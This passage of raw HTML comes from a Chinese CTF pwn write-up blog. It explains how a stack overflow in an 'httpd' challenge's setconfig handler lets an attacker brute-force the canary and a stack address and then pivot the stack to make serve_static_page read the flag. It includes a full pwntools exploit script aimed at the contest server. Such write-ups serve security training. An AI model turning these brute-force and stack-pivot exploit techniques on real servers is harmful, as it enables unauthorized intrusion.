</span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v6</span> <span class="o">=</span> <span class="n">a2</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="n">v11</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">v7</span> <span class="o">=</span> <span class="o">*</span><span class="n">v6</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">v11</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">v11</span> <span class="o">-</span> <span class="n">a1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>解析 url</p> <h3 id="攻击思路-3">攻击思路 </h3><p>唯一的漏洞是 setconfig 函数的栈溢出</p> <p>利用这个栈溢出我们可以实现 canary 的爆破和 stack 的爆破</p> <p>我们希望最终能劫持 serve_static_page 来完成读取 flag 的任务</p> <p>要怎么做呢?请看汇编:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BDB</span> <span class="n">endbr64</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BDF</span> <span class="n">push</span> <span class="n">rbp</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BE0</span> <span class="n">mov</span> <span class="n">rbp</span><span class="p">,</span> <span class="n">rsp</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BE3</span> <span class="n">sub</span> <span class="n">rsp</span><span class="p">,</span> <span class="mi">30</span><span class="n">h</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BE7</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_24</span><span class="p">],</span> <span class="n">edi</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BEA</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">filename</span><span class="p">],</span> <span class="n">rsi</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BEE</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_28</span><span class="p">],</span> <span class="n">edx</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BF1</span> <span class="n">mov</span> <span class="n">rax</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">filename</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BF5</span> <span class="n">lea</span> <span class="n">rdx</span><span class="p">,</span> <span class="n">modes</span> <span class="p">;</span> <span class="s2">&#34;r&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BFC</span> <span class="n">mov</span> <span class="n">rsi</span><span class="p">,</span> <span class="n">rdx</span> <span class="p">;</span> <span class="n">modes</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">BFF</span> <span class="n">mov</span> <span class="n">rdi</span><span class="p">,</span> <span class="n">rax</span> <span class="p">;</span> <span class="n">filename</span> </span></span><span class="line"><span class="cl"><span class="o">.</span><span class="n">text</span><span class="p">:</span><span class="mi">0000000000402</span><span class="n">C02</span> <span class="n">call</span> <span class="n">_fopen</span> </span></span></code></pre></td></tr></table> </div> </div><p>我们可以通过栈迁移到栈上去布置 <code>[rbp+var_24] | [rbp+filename] | [rbp+var_28]</code> 然后 rip 跳到 402BF5 ,这样就相当于劫持了 serve_static_page 的参数</p> <p>然后就可以读取 flag 啦</p> <h3 id="exp-3">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">os</span> <span class="o">=</span> <span class="s1">&#39;linux&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">file</span> <span class="o">=</span> <span class="s1">&#39;./httpd&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="s1">&#39;60.205.163.215&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">port</span> <span class="o">=</span> <span class="mi">13774</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">conn</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;127.0.0.1&#39;</span><span class="p">,</span> <span class="mi">9999</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">remote</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="n">p</span> <span class="o">=</span> <span class="kc">None</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">dbg</span><span class="p">(</span><span class="n">cmd</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">gdbscript</span> <span class="o">=</span> <span class="n">cmd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sa</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">rl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">itr</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">uu32</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u32</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uu64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u64</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uru64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">uu64</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="s1">&#39;</span><span class="se">\x7f</span><span class="s1">&#39;</span><span class="p">)[</span><span class="o">-</span><span class="mi">6</span><span class="p">:])</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">name</span> <span class="p">:</span><span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="n">name</span> <span class="o">+</span> <span class="s1">&#39; = &#39;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">eval</span><span class="p">(</span><span class="n">name</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">canary</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">stack</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">url_encode</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="nb">str</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="s1">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;%</span><span class="si">{</span><span class="n">b</span><span class="si">:</span><span class="s1">02x</span><span class="si">}</span><span class="s1">&#39;</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="n">data</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">build_req</span><span class="p">(</span><span class="n">method</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">body</span><span class="o">=</span><span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">request</span> <span class="o">=</span> <span class="sa">f</span><span class="s1">&#39;</span><span class="si">{</span><span class="n">method</span><span class="si">}</span><span class="s1"> </span><span class="si">{</span><span class="n">path</span><span class="si">}</span><span class="s1"> HTTP/1.1</span><span class="se">\r\n</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">headers</span> <span class="ow">is</span> <span class="kc">None</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">headers</span> <span class="o">=</span> <span class="p">{}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">body</span> <span class="ow">and</span> <span class="s1">&#39;Content-Length&#39;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">headers</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">headers</span><span class="p">[</span><span class="s1">&#39;Content-Length&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">body</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">headers</span><span class="o">.</span><span class="n">items</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">request</span> <span class="o">+=</span> <span class="sa">f</span><span class="s1">&#39;</span><span class="si">{</span><span class="n">k</span><span class="si">}</span><span class="s1">: </span><span class="si">{</span><span class="n">v</span><span class="si">}</span><span class="se">\r\n</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">request</span> <span class="o">+=</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\r\n</span><span class="s1">&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">request</span> <span class="o">+=</span> <span class="n">body</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">request</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">config</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">ip</span><span class="p">,</span> <span class="n">subnet_mask</span><span class="p">,</span> <span class="n">gateway</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">p</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">conn</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="p">(</span><span class="n">build_req</span><span class="p">(</span><span class="s1">&#39;POST&#39;</span><span class="p">,</span> <span class="s1">&#39;/config&#39;</span><span class="p">,</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;Cookie&#39;</span><span class="p">:</span> <span class="s1">&#39;token=&#39;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> <span class="sa">b</span><span class="s1">&#39;route_name=&#39;</span> <span class="o">+</span> <span class="n">name</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;&amp;ip=&#39;</span> <span class="o">+</span> <span class="n">ip</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;&amp;subnet_mask=&#39;</span> <span class="o">+</span> <span class="n">subnet_mask</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;&amp;gateway=&#39;</span> <span class="o">+</span> <span class="n">gateway</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">explode_canary</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">p</span><span class="p">,</span> <span class="n">canary</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x100</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x28</span> <span class="o">+</span> <span class="n">url_encode</span><span class="p">(</span><span class="n">canary</span> <span class="o">+</span> <span class="n">p8</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">config</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="sa">b</span><span class="s1">&#39;500 Internal Server Error&#39;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\r\n\r\n</span><span class="s1">&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">canary</span> <span class="o">+=</span> <span class="n">p8</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;Found canary byte: </span><span class="si">{</span><span class="n">i</span><span class="si">:</span><span class="s1">#x</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">explode_stack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">p</span><span class="p">,</span> <span class="n">stack</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">6</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x100</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x28</span> <span class="o">+</span> <span class="n">url_encode</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">))</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x10</span> <span class="o">+</span> <span class="n">url_encode</span><span class="p">(</span><span class="n">stack</span> <span class="o">+</span> <span class="n">p8</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">config</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="sa">b</span><span class="s1">&#39;500 Internal Server Error&#39;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\r\n\r\n</span><span class="s1">&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">stack</span> <span class="o">+=</span> <span class="n">p8</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;Found stack byte: </span><span class="si">{</span><span class="n">i</span><span class="si">:</span><span class="s1">#x</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">send_page_addr</span> <span class="o">=</span> <span class="mh">0x402BF1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">explode_canary</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">canary</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;Leaked canary: </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">explode_stack</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">stack</span> <span class="o">=</span> <span class="n">uu64</span><span class="p">(</span><span class="n">stack</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x170</span> </span></span><span class="line"><span class="cl"><span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;Leaked stack address: </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">stack</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">pause</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x28</span> <span class="o">+</span> <span class="n">url_encode</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">))</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x10</span> <span class="o">+</span> <span class="n">url_encode</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">stack</span> <span class="o">+</span> <span class="mh">0x40</span><span class="p">))</span> <span class="o">+</span> <span class="n">url_encode</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">send_page_addr</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">fake_stack</span> <span class="o">=</span> <span class="n">flat</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x00</span><span class="p">:</span> <span class="n">stack</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x08</span><span class="p">:</span> <span class="n">p32</span><span class="p">(</span><span class="mi">200</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x0C</span><span class="p">:</span> <span class="n">p32</span><span class="p">(</span><span class="mi">4</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x10</span><span class="p">:</span> <span class="sa">b</span><span class="s1">&#39;flag</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="p">},</span> <span class="n">filler</span><span class="o">=</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">url_encode</span><span class="p">(</span><span class="n">fake_stack</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">config</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">itr</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div>CCSSSC-2026-pwn 题解https://blog.ratherhard.com/post/ctf-pwn/contest/ccsssc-2026-pwn-wp/Wed, 25 Mar 2026 14:04:00 +0000https://blog.ratherhard.com/post/ctf-pwn/contest/ccsssc-2026-pwn-wp/<img src="https://blog.ratherhard.com/" alt="Featured image of post CCSSSC-2026-pwn 题解" /><h1 id="初赛">初赛 </h1><h2 id="mailsystem">MailSystem </h2><p>唯一的 pwn</p> <h3 id="checksec">checksec </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td 